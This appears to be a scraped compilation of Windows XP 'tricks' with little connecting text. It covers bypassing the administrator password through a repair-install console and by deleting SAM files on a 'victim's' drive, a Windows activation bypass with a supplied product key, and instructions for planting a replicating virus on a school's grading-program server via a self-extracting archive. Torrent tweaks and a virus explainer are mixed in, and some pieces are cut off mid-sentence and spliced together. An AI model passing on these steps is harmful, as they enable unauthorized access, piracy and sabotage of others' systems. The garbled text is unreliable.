You can easily change or wipe out your Administrator password for free during a Windows XP Repair.


Here's how with a step-by-step description of the initial Repair process included for newbie's.


Place your Windows XP CD in your cd-rom and start your computer [ it's assumed here that your XP CD is bootable ]



After booting CD you will see the massege on your screen is "Press any key to boot from cd" you should press any key to continue,



The first screen will indicate that Setup is inspecting your system and loading files.


When you get to the Welcome to Setup screen, press ENTER to Setup Windows


The Licensing Agreement comes next »» Press F8 to accept it.


The next screen is the Setup screen which gives you the option to do a Repair.


It should read something like "If one of the following Windows XP installations is damaged, Setup can try to repair it"Use the up and down arrow keys to select your XP installation (if you only have one, it should already be selected) and press R to begin the Repair process.


Let the Repair run.


Setup will now check your disks and then start copying files which can take several minutes.


Shortly after the Copying Files stage, you will be required to reboot. (this will happen automatically and you will see a progress bar stating "Your computer will reboot in 15 seconds"



During the reboot, do not make the mistake of " pressing any key " to boot from the CD again!



Setup will resume automatically with the standard billboard screens and you will notice Installing Windows is highlighted.



Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole!


A command console will now open up giving you the potential for wide access to your system.


At the prompt, type ' NUSRMGR.CPL ' and press Enter.


woooo !! You have just gained graphical access to your User Accounts in the Control Panel.


Now simply pick the account you need to change and remove or change your password as you prefer.


If you want to log on without having to enter your new password, you can type control userpasswords2 at the prompt and choose to log on without being asked for password.


After you've made your changes close the windows, exit the command box and continue on with the Repair (have your Product key handy).


Once the Repair is done, you will be able to log on with your new password (or without a password if you chose not to use one or if you chose not to be asked for a password).


Your programs and personalized settings should remain intact.


I tested the above on Windows XP Pro with and without SP1 and also used this method in a real situation where someone could not remember their password and it worked like a charm to fix the problem.

Top Tips to increase bittorent download Speed

   The latest file sharing protocol bittorrent has modified everything when it comes to file sharing. It is a nice platform for downloading large files. Sharing of files include movies, iso images and MP3 songs. Bittorent is mainly famous for illegal file sharing .
The Bittorrent system can be slow at times due to heavy traffic. so let us tweak bittorrent sharing program a little bit.
There are a lot of different bittorrent clients that you can download. I think the best are BitCommet and uTorrent.

Here is a few tips to speed up uTorrent Client. Similar can be implemented on any other torrent clients ,which you are using.

Step 1: Increase TCP connections

You need to increase the number of TCP connections that are allowed at max.Windows XP Service Pack 2 came with the number of allowed open connections to 10. This is to stop any piece of spyware(in our case bittorent client even) from totally taking over your internet connection. TCP connection allowed should be 50 for optimal performance. The best way to increase the maximum number of connections is to apply patch that is available at www.lvllord.de. A nice way to fix this is to download this patch .

The little tweak to the torrent client works great in certain times. If you’re using uTorrent go to Options menu then Preferences. In the Preferences go the Advanced Options. In the advanced options change the net.max_halfopen connections to 80. In the same section change the max half open tcp connections to 80. Once your done click on OK and you are all set. This tweak will let the maximum TCP connection available for the bittorrent client. Now start downloading you’ll realize a little difference in the download speed. Port forwarding technique is more effective than this.

                               A third point of interest is that some “windows updates” revert your tweaked tcp connections back to 10. So it’s wise to check this every now and then. You can check this by going to (in windows xp) Start > Control Panel > Administrative Tools > Event Viewer > System… Look for event 4226 (sort by event).
If there are a lot of daily occurrences it’s likely that the max amount of half-open tcp connections was set back to 10. Or you’re infected with some nasty spy ware…

Step 2:Torrent Client Configuration
In order to apply these tips you must know your maximum up- and download speed. You can test your bandwidth over here (stop all download activity while testing).

Settings 1-4 can be found in the options, settings or preference tab of most torrent clients.

1. Maximum upload speed 

Probably the most important setting there is. Your connection is (sort of) like a pipeline, if you use you maximum upload speed there’s not enough space left for the files you are downloading. So you have to cap your upload speed.

Use the following formula to determine your optimal upload speed…

80% of your maximum upload speed

so if your maximum upload speed is 40 kB/s, the optimal upload rate is 32kB/s But keep seeding!

How Computer Viruses Work

Strange as it may sound, the computer virus is something of an Information Age marvel. On one hand, viruses show us how vulnerable we are -- a properly engineered virus can have a devastating effect, disrupting productivity and doing billions of dollars in damages. On the other hand, they show us how sophisticated and interconnected human beings have become.
For example, experts estimate that the Mydoom worm infected approximately a quarter-million computers in a single day in January 2004. Back in March 1999, the Melissa virus was so powerful that it forced Microsoft and a number of other very large companies to completely turn off their e-mail systems until the virus could be contained. The ILOVEYOU virus in 2000 had a similarly devastating effect. In January 2007, a worm called Storm appeared -- by October, experts believed up to 50 million computers were infected. That's pretty impressive when you consider that many viruses are incredibly simple.

When you listen to the news, you hear about many different forms of electronic infection. The most common are:

• Viruses - A virus is a small piece of software that piggybacks on real programs. For example, a virus might attach itself to a program such as a spreadsheet program. Each time the spreadsheet program runs, the virus runs, too, and it has the chance to reproduce (by attaching to other programs) or wreak havoc.
• E-mail viruses - An e-mail virus travels as an attachment to e-mail messages, and usually replicates itself by automatically mailing itself to dozens of people in the victim's e-mail address book. Some e-mail viruses don't even require a double-click -- they launch when you view the infected message in the preview pane of your e-mail software [source: Johnson].
• Trojan horses - A Trojan horse is simply a computer program. The program claims to do one thing (it may claim to be a game) but instead does damage when you run it (it may erase your hard disk). Trojan horses have no way to replicate automatically.
• Worms - A worm is a small piece of software that uses computer networks and security holes to replicate itself. A copy of the worm scans the network for another machine that has a specific security hole. It copies itself to the new machine using the security hole, and then starts replicating from there, as well.

forget the cracks and injectors etc... this is the BEST WAY:
1) start > run > "regedit" (without the quotes of course)
2) go to the key:HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer...and doubleclick on it.
Then change some of the value data to ANYTHING ELSE...delete some, add some letters, I don't care...just change it!now close out regedit.
3) go to start > run > "%systemroot%\system32\oobe\msoobe.exe /a" (again, dont type the quotes)
4) the activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ.
Now you can dl all the updates without activating,
and the Genuine Microsoft Validation thingy won't bug you no more!!
Works with most WinXP versions though ther r some exceptions...

On startup the window should appear.
Note: This does not harm your computer as it does not contain virus.

The Yes and no button does not do anything except closing the window. And you can edit the virus in the sentence: Warning a virus has detected on your PC to any kind of virus eg.Trojan Horse like this lol=msgbox ("Warning a Trojan horse has been detected on your PC. How to "Delete administrator Password" without any software

Method 1

Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.

Method 2

Step 1. Put your hard disk of your computer in any other pc .Step 2. Boot that computer and use your hard disk as a secondary hard disk (D'nt boot as primary hard disk ).Step 3. Then open that drive in which the victim’s window(or your window) is installed.Step 4. Go to location windows->system32->configStep 5. And delete SAM.exe and SAM.log
Step 6. Now remove hard disk and put in your computer.
Step 7. And boot your computer :-)

Shut down your School!!

By using the following command you can shutdown  your school or college by using only Notepad.

This is the main command that will be launched upon startup.
Type this in Notepad.

Set up the replication system .Here is the code to set up the replicator (the program that allows the virus to reproduce). To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.

The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)

Stop restart after windows update

To stop this service, open [Command Prompt] (Start>Run>cmd>Enter)

Then type the following command sc stop wuauserv .

This will not prevent Automatic Updates from starting at the next boot. So don't worry, you'll keep getting Windows updates. Just don't forget to restart eventually.

Unable to run an application as Administrator??????

1.Go to start>run>cmd

2.Type in- D:\>net user administrator /random

3. Now right click on the command prompt and click mark.
4.Mark the password and press ENTER(to copy) and paste it where ever you want.
5.If you do this again it will generate different password (actually changes the password) and the 1st one will not work

6.Now click on any program u want to open as administrator.
7.Click run as and paste the password.
